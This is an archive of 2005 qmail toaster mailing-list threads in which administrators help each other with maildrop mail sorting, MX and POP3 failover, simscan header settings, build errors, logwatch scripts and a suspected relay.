Thanks all - that's a few really useful suggestions; I will try procmail & "q-sorter" (which I absolutely had not heard of before but looks very interesting) - and reply again with my success (if any :) ) Regards, David. > -Original Message- > From: Aleksander Olsen [mailto:[EMAIL PROTECTED] > Sent: Saturday, 24 September 2005 5:10 AM > To: toaster@shupp.org > Subject: Re: [toaster] Sorting mail > > > http://q-sorter.sourceforge.net > > On 9/23/05, Bill Shupp <[EMAIL PROTECTED]> wrote: > > David wrote: > > > Hi all, > > > > > > The Shupp toaster is an extremely neat package, and I have > been using it for > > > over 12 months now on several boxes. > > > > > > I have found IMAP to be extremely useful to handle a large > amount of e-mail, > > > including archived messages, accross several MUA's including webmail > > > (squirrelmail). > > > > > > But one feature I'm desperately lacking is the ability to > sort mail into > > > IMAP folders based on simple rules (eg. sender or subject). I > don't need > > > complex filtering, which various packages provide (eg. > procmail) but I *do* > > > need the ability to move mail into different folders based on filter > > > settings. > > > > > > Knowing that I will have to integrate this with qmail & > courier as well, I > > > thought I'd ask here first. Does anyone has anything going > like this? Does > > > anyone have any suggestions for what I should try? > > > > > > I have looked at procmail, sieve, and maildrop, but I haven't > figured out > > > any way of getting those programs to actually *move* my mail > into different > > > folders; they seem to be "accept or reject" only... > > > > maildrop is what you want. www.courier-mta.org. > > > > Regards, > > > > Bill > > > > !DSPAM:43347fe842961256812480! > >
RE: [toaster] Sorting mail
> -Original Message-
> From: David [mailto:[EMAIL PROTECTED]
> Sent: Saturday, 24 September 2005 3:32 AM
> To: Qmail Toaster
> Subject: [toaster] Sorting mail
>
>
> Hi all,
>
> The Shupp toaster is an extremely neat package, and I have been
> using it for
> over 12 months now on several boxes.
>
> I have found IMAP to be extremely useful to handle a large amount
> of e-mail,
> including archived messages, accross several MUA's including webmail
> (squirrelmail).
>
> But one feature I'm desperately lacking is the ability to sort mail into
> IMAP folders based on simple rules (eg. sender or subject). I don't need
> complex filtering, which various packages provide (eg. procmail)
> but I *do*
> need the ability to move mail into different folders based on filter
> settings.
>
> Knowing that I will have to integrate this with qmail & courier as well, I
> thought I'd ask here first. Does anyone has anything going like this? Does
> anyone have any suggestions for what I should try?
>
> I have looked at procmail, sieve, and maildrop, but I haven't figured out
> any way of getting those programs to actually *move* my mail into
> different
> folders; they seem to be "accept or reject" only...
>
> Thanks & regards,
>
> David.
>
Just thought I'd clarify that the capability I'm after is _server side_
sorting... I am aware of various ways to achieve what I'm after using the
filtering plugin for squirrelmail, but I need to filter on the server side
('cause I don't always access my e-mail with squirrelmail).
David.
>
> !DSPAM:4334431a99451214535308!
>
>
[toaster] Sorting mail
Hi all, The Shupp toaster is an extremely neat package, and I have been using it for over 12 months now on several boxes. I have found IMAP to be extremely useful to handle a large amount of e-mail, including archived messages, accross several MUA's including webmail (squirrelmail). But one feature I'm desperately lacking is the ability to sort mail into IMAP folders based on simple rules (eg. sender or subject). I don't need complex filtering, which various packages provide (eg. procmail) but I *do* need the ability to move mail into different folders based on filter settings. Knowing that I will have to integrate this with qmail & courier as well, I thought I'd ask here first. Does anyone has anything going like this? Does anyone have any suggestions for what I should try? I have looked at procmail, sieve, and maildrop, but I haven't figured out any way of getting those programs to actually *move* my mail into different folders; they seem to be "accept or reject" only... Thanks & regards, David.
RE: [toaster] Query about backup-mx's
> -Original Message- > From: rene marticke [mailto:[EMAIL PROTECTED] > Sent: Friday, 9 September 2005 9:19 PM > To: toaster@shupp.org > Subject: Re: [toaster] Query about backup-mx's > > > > >I have thought about something similar... is this basically how > dynamic dns > >works? ie. no special technology, just (real) short ttl's ? > > > > > yes. this is what i do here for remoteaccess to customers not using > public dyndns sites or such. > I have my own dns with 60 seconds ttl. and the ip's are fetch from > vpopmail last auth ;-) > > i use pdns with mysql backend. thanks - that's interesting. I might give the short ttl's a go. Should be easy enough for my situation - if the master's not available, update the dns. David > regars rene > > > !DSPAM:432176c265381222614394! > >
RE: [toaster] Query about backup-mx's
> -Original Message- > From: rene marticke [mailto:[EMAIL PROTECTED] > Sent: Friday, 9 September 2005 9:08 PM > To: toaster@shupp.org > Subject: Re: [toaster] Query about backup-mx's > > > > >So I suppose that SMTP failover is more or less possible, now > I'm stuck on > >the pop3 failover! > > > >Thanks again, > > > >David. > > > > > If you have access to your nameserver you can edit the A record > pop3.domain.tld and set a ttl of 60 seconds. > If Masterpop faied just edit this entry and the lookup of > pop3.domain.tld goes to your backup server. > > this is just an untested idea :-) I have thought about something similar... is this basically how dynamic dns works? ie. no special technology, just (real) short ttl's ? I guess this means the dns server has to be on a separate link too, but oh well, that's really how it _should_ be anyway... David. > rene > > !DSPAM:4321742a62511538913330! > >
RE: [toaster] Query about backup-mx's
> -Original Message-
> From: Tom Collins [mailto:[EMAIL PROTECTED]
> Sent: Thursday, 8 September 2005 12:46 AM
> To: toaster@shupp.org
> Subject: Re: [toaster] Query about backup-mx's
>
>
> On Sep 7, 2005, at 8:01 AM, David wrote:
> > My question is: if mail.backup.dom receives e-mail intended test.com,
> > how
> > does it decide that the mail should go to mail.master.dom? ie. does
> > the DNS
> > data override all /control/locals entries (_and_
> > /control/virtualdomains)?
> > or, will it be the case that even if mail.backup.dom is _not_ primary
> > mx for
> > test.com (as in my little example above), will it still check
> > /control/rcpthosts and/or /control/virtualdomains and, if an entry is
> > found
> > in there for test.com, deliver it locally?
> >
> > What I am trying to investigate is the possibility of true backup
> > mailserver
> > takover; ie. something better than silently queing my mail on a backup
> > mx
> > when the primary is offline. But if the DNS data overrides
> > /control/rcpthosts and /control/virtualdomains, then my quest is
> > pointless... I'll never be able to make a simple configuration change
> > on the
> > fly and have my backup mx become my primary mx without modifying my DNS
> > (which I want to avoid at all costs, as it takes so long for the
> > changes to
> > take effect as to be pointless).
>
> If the domain is only in rcpthosts, then your backup will queue it and
> continue trying to deliver to the primary server.
>
> If you have it in virtualdomains, then qmail should deliver it locally
> to that machine. Of course, you need to figure out how to keep mail
> and configuration information synchronized between the servers if you
> go that route.
Thanks guys for the info.
I guess that more specifically I have now narrowed my problem of failover
accross an Internetwork link down to the pop3 server! Of all things... the
effect of which, I imagine in production, would be something like: master mx
goes down, that's fine; all mail is delivered to backup mx (locally), which
has shared storage/rsync/etc. with master so it has all the mail on it. User
goes to check mail ("send/receive") and receives an error that the pop3
server cannot be found: there's no way to failover the address of the pop3
server (because that is entered in the MUA's mail settings).
So I suppose that SMTP failover is more or less possible, now I'm stuck on
the pop3 failover!
Thanks again,
David.
> -Tom
>
>
> !DSPAM:431f0433129511828715420!
>
>
[toaster] Query about backup-mx's
I have a question regarding the "backup-mx" operation of the toaster: I have something like domain: test.com MX 5 mail.master.dom MX 10 mail.backup.dom in my DNS records. Say mail.master.dom goes down; the sending MTA automatically routes e-mail to mail.backup.dom. My question is: if mail.backup.dom receives e-mail intended test.com, how does it decide that the mail should go to mail.master.dom? ie. does the DNS data override all /control/locals entries (_and_ /control/virtualdomains)? or, will it be the case that even if mail.backup.dom is _not_ primary mx for test.com (as in my little example above), will it still check /control/rcpthosts and/or /control/virtualdomains and, if an entry is found in there for test.com, deliver it locally? What I am trying to investigate is the possibility of true backup mailserver takover; ie. something better than silently queing my mail on a backup mx when the primary is offline. But if the DNS data overrides /control/rcpthosts and /control/virtualdomains, then my quest is pointless... I'll never be able to make a simple configuration change on the fly and have my backup mx become my primary mx without modifying my DNS (which I want to avoid at all costs, as it takes so long for the changes to take effect as to be pointless). Many thanks for the toaster Bill & contributors, and sorry for the "off-topicness" of this e-mail, David Branford Aternox Design www.aternoxdesign.com.au <[EMAIL PROTECTED]>
RE: [toaster] Message header verbosity
Thanks Nicholas, that's very helpful. David. > -Original Message- > From: Nicholas Moline [mailto:[EMAIL PROTECTED] > Sent: Thursday, 1 September 2005 2:29 AM > To: toaster@shupp.org > Subject: Re: [toaster] Message header verbosity > > > Well the first line you echo is kinda required by the RFC spec and all > mailer daemons are supposed to add it. For the simscan do you want to > remove the line from all mail or just mail going OUT (i.e. from you to > external mail accounts). If you don't want the simscan line to show up > at all, just recompile simscan and in the configure process change the > --enable-received=y to --enable-received=n > > If you just don't want to have the simscan on outgoing messages, and you > are certain your outgoing e-mail is clean, just make sure mail from you > doesn't go through simscan (in the ~vpopmail/etc/tcp.smtp file), by > setting your ip range that you don't want scanned by simscan to go > straight to qmail-queue instead of to simscan, for example if your > computers that you don't want scanned are on the network 192.168.5.* > then you would setup your tcp.smtp file thusly: > > 127.:allow,QMAILQUEUE="/var/qmail/bin/qmail-queue",RELAYCLIENT="" > 192.168.5.:allow,QMAILQUEUE="/var/qmail/bin/qmail-queue",RELAYCLIENT="" > :allow,QMAILQUEUE="/var/qmail/bin/simscan" > > This way things from localhost, and 192.168.5.* will not be scanned by > simscan and will be allowed to relay, while everything else (aka all > incoming mail from the internet) will be scanned. > David wrote: > > >Hi all, > > > >I'm getting a little more verbose info in my message headers (though I > >imagine this info is invaluable when testing your new toaster) > for example: > > > >Received: (qmail 27634 invoked by uid 89); 31 Aug 2005 06:12:12 - > > > >...this line might not be so much of a problem? > > > >but this from simscan: > > > >Received: by simscan 1.1.0 ppid: 27627, pid: 27630, t: 0.0698s > > scanners: attach: 1.1.0 clamav: 0.83/m:29/d:748 > > > >probably contains more info. than I would like to send out. > > > >Please, where can I turn this off? > > > >Regards, > > > >David Branford > > > >Aternox Design > >www.aternoxdesign.com.au > ><[EMAIL PROTECTED]> > > > > > > > > > > > !DSPAM:4315e1dd95658214711775! > >
[toaster] Message header verbosity
Hi all, I'm getting a little more verbose info in my message headers (though I imagine this info is invaluable when testing your new toaster) for example: Received: (qmail 27634 invoked by uid 89); 31 Aug 2005 06:12:12 - ...this line might not be so much of a problem? but this from simscan: Received: by simscan 1.1.0 ppid: 27627, pid: 27630, t: 0.0698s scanners: attach: 1.1.0 clamav: 0.83/m:29/d:748 probably contains more info. than I would like to send out. Please, where can I turn this off? Regards, David Branford Aternox Design www.aternoxdesign.com.au <[EMAIL PROTECTED]>
RE: [toaster] gmake problems with redhat 9
Whoops, sorry - make CPPFLAGS=-I/usr/kerberos/include should of course be gmake CPPFLAGS=-I/usr/kerberos/include David Branford Aternox Design www.aternoxdesign.com.au <[EMAIL PROTECTED]> > -Original Message- > From: David [mailto:[EMAIL PROTECTED] > Sent: Friday, 26 August 2005 9:46 PM > To: Qmail Toaster > Subject: [toaster] gmake problems with redhat 9 > > > Hi all, > > Just thought I'd post this to the list as an easy way to keep a > reference to > it. > > My system is redhat 9. When running gmake on the install of > courier-imap on > the latest version of the toaster at www.shupp.org/toaster, I was > receiving > the error: > > /usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory > > so I had to tell gmake where my redhat dist. had put them: > > make CPPFLAGS=-I/usr/kerberos/include > > ...worked fine. > > Regards, > > David Branford > > Aternox Design > www.aternoxdesign.com.au > <[EMAIL PROTECTED]> > > > > !DSPAM:430f0809183122820515559! > >
[toaster] gmake problems with redhat 9
Hi all, Just thought I'd post this to the list as an easy way to keep a reference to it. My system is redhat 9. When running gmake on the install of courier-imap on the latest version of the toaster at www.shupp.org/toaster, I was receiving the error: /usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory so I had to tell gmake where my redhat dist. had put them: make CPPFLAGS=-I/usr/kerberos/include ...worked fine. Regards, David Branford Aternox Design www.aternoxdesign.com.au <[EMAIL PROTECTED]>
[toaster] How to restart log services when they 'disappear'?
action "Stopping service `basename $service`:" "$BINDIR/svc -d
$service"
[ -k $service ] && action "Stopping service log `basename
$service`:" "$BINDIR/svc -d $service/log"
done
allow_null_glob_expansion="$x"
;;
status)
status svscan
RETVAL=$?
x="$allow_null_glob_expansion"
allow_null_glob_expansion=1
for service in $SERVICESDIR/*
do
$BINDIR/svstat $service
done
allow_null_glob_expansion="$x"
;;
restart|reload)
$0 stop
$0 start
RETVAL=$?
;;
*)
echo "Usage: svscan {start|stop|restart|reload|status}"
exit 1
esac
exit $RETVAL
--
Sorry for the huge post; trying to be as clear/detailed as possible.
Regards,
David Branford
Aternox Design
www.aternoxdesign.com.au
<[EMAIL PROTECTED]>
RE: [toaster] update to qmail-logwatch
> -Original Message- > From: Bob Hutchinson [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 17 August 2005 3:27 AM > To: toaster@shupp.org > Subject: Re: [toaster] update to qmail-logwatch > > > On Wednesday 10 Aug 2005 08:31, David wrote: > > > -Original Message- > > > From: Bob Hutchinson [mailto:[EMAIL PROTECTED] > > > Sent: Saturday, 6 August 2005 10:08 PM > > > To: toaster@shupp.org > > > Subject: [toaster] update to qmail-logwatch > > > > > > > > > I have fixed a number of bugs, especially in the CHKUSER stuff in > > > qmail-smtpd > > > > > > http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.7.tar.gz > > > > I was getting a lot of stuff like this in my logwatch reports: > > > > /etc/log.d/scripts/services/qmail-send: line 5: =: command not found > > /etc/log.d/scripts/services/qmail-send: line 6: =: command not found > > /etc/log.d/scripts/services/qmail-send: line 7: =: command not found > > /etc/log.d/scripts/services/qmail-send: line 8: =: command not found > > /etc/log.d/scripts/services/qmail-send: line 9: =: command not found > > /etc/log.d/scripts/services/qmail-send: line 10: =: command not found > > > > Running RedHat 9. > > > > So... I added this line: > > > > #!/usr/perl > > > > To the beginning of these files: > > > > /etc/log.d/scripts/services/qmail-pop3d > > /etc/log.d/scripts/services/qmail-pop3d3 > > /etc/log.d/scripts/services/qmail-send > > /etc/log.d/scripts/services/qmail-smtpd > > Sorry not to answer sooner, been away walking the hills. lol no worries - thanks for your answer! > I'm using logwatch-6.1.2, perhaps yours is older. > I have added a note to the README ah - perhaps time I changed to FC3... > > > > and now I get cool stuff like: > > > > Chkuser Accepts to (Threshold of 1): > > [EMAIL PROTECTED] - 54 Time(s) > > [EMAIL PROTECTED] - 19 Time(s) > > [EMAIL PROTECTED] - 5 Time(s) > > [EMAIL PROTECTED] - 2 Time(s) > > [EMAIL PROTECTED] - 2 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > [EMAIL PROTECTED] - 1 Time(s) > > > > Simscan Viruses (Threshold of 1): > > HTML.Phishing.Bank-1 - 1 Time(s) > > > > > > in my logs!! ...did I do the right thing ? > > looks about right, now tweak the thresholds > in /etc/log.d/conf/services/qmail-smtpd.conf to reduce the size of the > logwatch output. cool - I'll look at those; output's becoming rather a lot Thanks, David. > HTH > -- > - > Bob Hutchinson > Midwales dot com > - > > !DSPAM:430228f3113347681716748! > >
RE: [toaster] update to qmail-logwatch
> -Original Message- > From: Bob Hutchinson [mailto:[EMAIL PROTECTED] > Sent: Saturday, 6 August 2005 10:08 PM > To: toaster@shupp.org > Subject: [toaster] update to qmail-logwatch > > > I have fixed a number of bugs, especially in the CHKUSER stuff in > qmail-smtpd > > http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.7.tar.gz > I was getting a lot of stuff like this in my logwatch reports: /etc/log.d/scripts/services/qmail-send: line 5: =: command not found /etc/log.d/scripts/services/qmail-send: line 6: =: command not found /etc/log.d/scripts/services/qmail-send: line 7: =: command not found /etc/log.d/scripts/services/qmail-send: line 8: =: command not found /etc/log.d/scripts/services/qmail-send: line 9: =: command not found /etc/log.d/scripts/services/qmail-send: line 10: =: command not found Running RedHat 9. So... I added this line: #!/usr/perl To the beginning of these files: /etc/log.d/scripts/services/qmail-pop3d /etc/log.d/scripts/services/qmail-pop3d3 /etc/log.d/scripts/services/qmail-send /etc/log.d/scripts/services/qmail-smtpd and now I get cool stuff like: Chkuser Accepts to (Threshold of 1): [EMAIL PROTECTED] - 54 Time(s) [EMAIL PROTECTED] - 19 Time(s) [EMAIL PROTECTED] - 5 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) Simscan Viruses (Threshold of 1): HTML.Phishing.Bank-1 - 1 Time(s) in my logs!! ...did I do the right thing ? David. > -- > - > Bob Hutchinson > Midwales dot com > - > > !DSPAM:42f4af47164761382817466! >
RE: [toaster] update to qmail-logwatch
Cool - thanks Bob! > -Original Message- > From: Bob Hutchinson [mailto:[EMAIL PROTECTED] > Sent: Saturday, 6 August 2005 10:08 PM > To: toaster@shupp.org > Subject: [toaster] update to qmail-logwatch > > > I have fixed a number of bugs, especially in the CHKUSER stuff in > qmail-smtpd > > http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.7.tar.gz > > > -- > - > Bob Hutchinson > Midwales dot com > - > > !DSPAM:42f4af47164761382817466! > >
RE: [toaster] Weird problem... *solved*
OK I solved my own thread :) Sorry for the noise... there are sooo many ways/distro scripts (so it seems to me anyway) to do the same thing. I had a different default gateway specified in /etc/sysconfig/network than in /etc/sysconfig/network-scripts/ files. Don't know how it messed me up in this particular instance, but my toaster is working again :) David. > -Original Message- > From: David [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 10 August 2005 11:37 AM > To: Qmail Toaster > Subject: [toaster] Weird problem... > > > Hi all, > > First of all sorry this is a little off topic and may not be entirely > qmail-related, but I am stuck with this one and wondered if anyone else on > here has had the same experience. > > I have the latest version of Bill's toaster installed on a redhat 9 box, > which also happens to be my internet gateway. Today, I find that > I am unable > to send/receive e-mail using the DNS name of the qmail server > (mail.mydomain.net) from the LAN attached to my gateway. I have > checked the > obvious; address resolves fine, internet access is fine, run a > test without > any firewall rules. > > The weird thing is that I can send/receive mail fine if I put in the > internal IP address of the gateway. > > I know this is the type of question that comes up a hundred times > from 'new > users', and the answer is always an obvious one (one thing I like about > Linux as opposed to Window$ is that there's always a _reason_ for > something > not working that I can _find_ and _fix_) but I just can't figure > out what it > is in this case. It's getting rather desperate since my users are > one by one > beginning to experience this difficulty. > > Thanks for you posts, > > David. > > > > !DSPAM:42f96147216241747669939! > >
[toaster] Weird problem...
Hi all, First of all sorry this is a little off topic and may not be entirely qmail-related, but I am stuck with this one and wondered if anyone else on here has had the same experience. I have the latest version of Bill's toaster installed on a redhat 9 box, which also happens to be my internet gateway. Today, I find that I am unable to send/receive e-mail using the DNS name of the qmail server (mail.mydomain.net) from the LAN attached to my gateway. I have checked the obvious; address resolves fine, internet access is fine, run a test without any firewall rules. The weird thing is that I can send/receive mail fine if I put in the internal IP address of the gateway. I know this is the type of question that comes up a hundred times from 'new users', and the answer is always an obvious one (one thing I like about Linux as opposed to Window$ is that there's always a _reason_ for something not working that I can _find_ and _fix_) but I just can't figure out what it is in this case. It's getting rather desperate since my users are one by one beginning to experience this difficulty. Thanks for you posts, David.
RE: [toaster] Toaster 0.8 up
That's fantastic news Bill! The new look is interesting too - looks familiar somehow... :) I particularly appreciate the addition of well-worked-out qmailmrtg instructions. I have been using qmailmrtg for about 6 months or so now, and am wrapped with all the information it gives (and it looks pretty too!). What I would really like to see, and something which I am experimenting with at the moment, is the mrtg part replaced with the newer rrdtool. I have found some info. on doing that here: http://www.wheely-bin.co.uk/pages/28/ If anyone else is interested. Thanks again, and keep the updates coming! We appreciate it! David. > -Original Message- > From: Bill Shupp [mailto:[EMAIL PROTECTED] > Sent: Tuesday, 26 July 2005 11:40 AM > To: toaster@shupp.org > Subject: [toaster] Toaster 0.8 up > > > All, > > I have updated the toaster document to version 0.8. All software > packages are upgraded where relevant, as is the qmail-toaster patch > version. There are a few new things, including qmailmrtg7 instructions, > new Debian notes, and the ability to change the source paths to > something other than "/var/src". And check out the new look! > > There's also an RSS feed for shupp.org at feed://www.shupp.org/index.rss. > > Please help test it out if you get a chance, and send any comments to > this list. > > Cheers, > > Bill Shupp > > !DSPAM:42e59b7a57051151916275! > >
RE: [toaster] logwatch-qmail
Most handy! I have been wanting something like this for my redhat setups for some time; will give it a try! David. > -Original Message- > From: Bob Hutchinson [mailto:[EMAIL PROTECTED] > Sent: Monday, 20 June 2005 9:04 PM > To: toaster@shupp.org > Subject: [toaster] logwatch-qmail > > > For those of you interested in parsing qmail multilog files in logwatch, > I have added simscan and CHKUSER filters to qmail-smtpd > > http://midwales.com/hutch/downloads/logwatch/logwatch-qmail-1.0.6.tar.gz > > Feedback welcome of course ;-) > > -- > - > Bob Hutchinson > Midwales dot com > - > > !DSPAM:42b6a9d254777047185227! > >
RE: [toaster] Possible relay?
> -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Thursday, 9 June 2005 1:04 AM > To: toaster@shupp.org > Subject: Re: [toaster] Possible relay? > > > On Jun 7, 2005, at 11:25 PM, David wrote: > > 2005-06-08 15:33:07.619543500 info msg 8225097: bytes 2214 from <> qp > > 28395 > > uid 89 > > 2005-06-08 15:33:07.639654500 starting delivery 7816: msg 8225097 to > > remote > > [EMAIL PROTECTED] > > 2005-06-08 15:33:07.639657500 status: local 0/10 remote 1/20 > > 2005-06-08 15:33:13.133576500 delivery 7816: failure: > > Connected_to_[a_remote_ip]_but_sender_was_rejected./Remote_host_said: > > _501_#2 > > 175005_Syntax_error_in_parameters_or_arguments/ > > It's probably a bounce here's a command to look at the message > contents, replace 8225097 with whatever message number from your logs > that you want to view: > > more `find /var/qmail/queue/mess -name 8225097` > > Keep in mind, that after a message is delivered the message number can > be re-used by another message. IIRC, the number is actually the inode > number of one of the files related to the message. Thanks guys, yes the message file was already gone off disk. I will check it the next time I see one of these types of messages and report back. Thanks again, David. > -- > Tom Collins - [EMAIL PROTECTED] > QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ > You don't need a laptop to troubleshoot high-speed Internet: > sniffter.com > > > !DSPAM:42a7101754162076342821! > >
[toaster] Possible relay?
Hi list, I have been running the Shupp Toaster for some time. My current version is 0.7.10, running on redhat 9. I have been receiving a few entries in my qmail log which appear a little dubious to me. They look like the following example, taken from today: # tail /var/log/qmail/current | tai64nlocal [snip] 2005-06-08 15:33:07.619543500 info msg 8225097: bytes 2214 from <> qp 28395 uid 89 2005-06-08 15:33:07.639654500 starting delivery 7816: msg 8225097 to remote [EMAIL PROTECTED] 2005-06-08 15:33:07.639657500 status: local 0/10 remote 1/20 2005-06-08 15:33:13.133576500 delivery 7816: failure: Connected_to_[a_remote_ip]_but_sender_was_rejected./Remote_host_said:_501_#2 175005_Syntax_error_in_parameters_or_arguments/ [/snip] The only substitutions I to the above were: - substituted domain of hill.h@ email address for [domain] - substituted the remote ip address for [a_remote_ip] both to protect the innocent... My concern is that to me, this log reads as though some outside party attempted to send a mal-formed message without a return address field through our mailserver, and succeeded. It appears that it was up to the destination mailserver to drop the message (for some reason)... if this is true, then wouldn't this mean unwanted parties can relay through our server by doing whatever was done here? It looks like the relay succeeded, but the remote server simply didn't like the message... if something shows up in their logs, they will have record that the message came through my server no? Any advice would be much appreciated, as this has me a little worried... David.
Re: [toaster] maildrop spamtrap
On Wed, 2005-04-13 at 11:52 -0700, joe wrote:
> Does anyone have a maildrop script for a spamtrap. I want to have email
> sent to a old email address automatically learned as spam. Does anyone
> have one that they want to share?
>
>
> Thank you,
>
>
> --Joe Young
--
I found this script time ago, for any maildrop learner:
http://mymail.alien77.com/maildropMEGAEXAMPLE
You can redirect mail as follows
if(/[EMAIL PROTECTED]/:h)
{
cc /domains/blah.com/spamhole/Maildir
exit
}
Then do whatever using a cron job script.
But if all you want is tag as spam any email arriving to a certain
account that's what I use, small bash script:
cat spamtrap
#!/bin/bash
DIR='/domains/blah.com/spamhole/Maildir/cur'
X="`(cd $DIR ; echo *)`"
if [ "$X" != "*" ] ; then
cd /domains/blah.com/spamhole/Maildir/cur
su vpopmail -c 'sa-learn --spam ./'
ls . | xargs -i mv ./{} ../.already/cur/
fi
HTH
David <[EMAIL PROTECTED]>
RE: [toaster] TLS connect failed
Cool. Quite likely, the firewall between that server & the internet is not configured to allow TLS thru. Cheers, david -Original Message- From: Ingo Claro [mailto:[EMAIL PROTECTED] Sent: Monday, April 04, 2005 12:34 PM To: toaster@shupp.org Subject: RE: [toaster] TLS connect failed David: that was it! i get the following: 250-TLS 250-HELP 250-STARTTLS 250-DSN 250-SIZE 2048 250-8BITMIME 250 PIPELINING starttls 220 Ready to start TLS Connection closed by foreign host. the server closed the connection inmediatly after doing the starttls. So it's a problem in the other server. regards, Ingo _ De: Pollack, David [mailto:[EMAIL PROTECTED] Enviado el: Lunes, 04 de Abril de 2005 13:05 Para: 'toaster@shupp.org' Asunto: [toaster] TLS connect failed There are a couple of things to check here. * Look in /var/log/qmail/qmail-send/current - are you seeing permissions errors for "clientcert.pem" and /or "servercert.pem"? * Make sure you have servercert.pem and clientcert.pem in /var/qmail/control, and that they are readable by the user that is running qmail. The simplest thing to do is to chown the files so that the qmail group is the owner - this way you're sure that all the qmail users can read it. * If this is happening with only ONE host on the intenet - like, it always fails to "domain.com" - there's a chance that the remote server is not configured correctly for TLS, but is saying that it is. You can test this like this: slimy:~> telnet mx1.domain.com 25 Trying 216.251.32.71... Connected to mx1.domain.com. Escape character is '^]'. 220 mail107.domain.com ESMTP Sendmail 8.13.1/8.13.1; Thu, 31 Mar 2005 12:01:12 -0500 ehlo domain.com 250-mail107.domain.com Hello slimy.dreamhost.com [205.196.208.18], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-8BITMIME 250-SIZE 52428800 250-DSN 250-AUTH PLAIN LOGIN 250-STARTTLS 250-DELIVERBY 250 HELP starttls 220 2.0.0 Ready to start TLS If you cant execute the "STARTTLS" command, somehting could be wrong on the remote server. Good luck, david -Original Message- From: Ingo Claro [mailto:[EMAIL PROTECTED] Sent: Monday, April 04, 2005 11:41 AM To: toaster@shupp.org Subject: [toaster] TLS connect failed Hello all, i've encountered the following bounce from my server: <[EMAIL PROTECTED]>: TLS connect failed; connected to xxx.xxx.xxx.xxx. I'm not going to try again; this message has been in the queue too long. anyone knows why it happens? regards, Ingo
[toaster] TLS connect failed
> There are a couple of things to check here. > > * Look in /var/log/qmail/qmail-send/current - are you seeing > permissions errors for "clientcert.pem" and /or "servercert.pem"? > * Make sure you have servercert.pem and clientcert.pem in > /var/qmail/control, and that they are readable by the user that is running > qmail. The simplest thing to do is to chown the files so that the qmail > group is the owner - this way you're sure that all the qmail users can > read it. > * If this is happening with only ONE host on the intenet - like, it > always fails to "domain.com" - there's a chance that the remote server is > not configured correctly for TLS, but is saying that it is. > > You can test this like this: > > slimy:~> telnet mx1.domain.com 25 > Trying 216.251.32.71... > Connected to mx1.domain.com. > Escape character is '^]'. > 220 mail107.domain.com ESMTP Sendmail 8.13.1/8.13.1; Thu, 31 Mar 2005 > 12:01:12 -0500 > ehlo domain.com > 250-mail107.domain.com Hello slimy.dreamhost.com [205.196.208.18], pleased > to meet you > 250-ENHANCEDSTATUSCODES > 250-PIPELINING > 250-8BITMIME > 250-SIZE 52428800 > 250-DSN > 250-AUTH PLAIN LOGIN > 250-STARTTLS > 250-DELIVERBY > 250 HELP > starttls > 220 2.0.0 Ready to start TLS > > > If you cant execute the "STARTTLS" command, somehting could be wrong on > the remote server. > > Good luck, > david > > -Original Message- > From: Ingo Claro [mailto:[EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> ] > Sent: Monday, April 04, 2005 11:41 AM > To: toaster@shupp.org > Subject: [toaster] TLS connect failed > > Hello all, > > i've encountered the following bounce from my server: > > <[EMAIL PROTECTED]>: > TLS connect failed; connected to xxx.xxx.xxx.xxx. > I'm not going to try again; this message has been in the queue too long. > > anyone knows why it happens? > > regards, > Ingo > <>
Re: [toaster] qmail maillog
- Original Message - From: "List" <[EMAIL PROTECTED]> To: Sent: Monday, April 04, 2005 4:20 PM Subject: Re: [toaster] qmail maillog List wrote: Hi List, I had install a fresh toaster and everything is running fine except that the incoming connections are not logged into /var/log/maillog. How can i make the connections log into the maillog file? I am running the lastest toaster with FC3. You need to use splogger instead of multilog if you want to log to syslog. See the qmail docs for how to set that up. This toaster uses multilog. Hi, Another question. How can I log vpopmail connections into /var/log/maillog? I have a RH9 running toaster 0.61 and have a log like Apr 4 14:56:17 advanced vpopmail[16375]: vchkpw-pop3: (PLAIN) login success [EMAIL PROTECTED]:220.225.58.53 I believe the latest version of the toaster does that. From a Shupp 0.7.9 toaster - /var/log/maillog: Apr 4 16:33:45 ns vpopmail[20286]: vchkpw-pop3: (PLAIN) login success [EMAIL PROTECTED]:192.168.1.102 Apr 4 16:33:45 ns vpopmail[20288]: vchkpw-pop3: (PLAIN) login success [EMAIL PROTECTED]:192.168.1.102 etc. David. regards !DSPAM:4250e3b8111719412120352!
Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start...
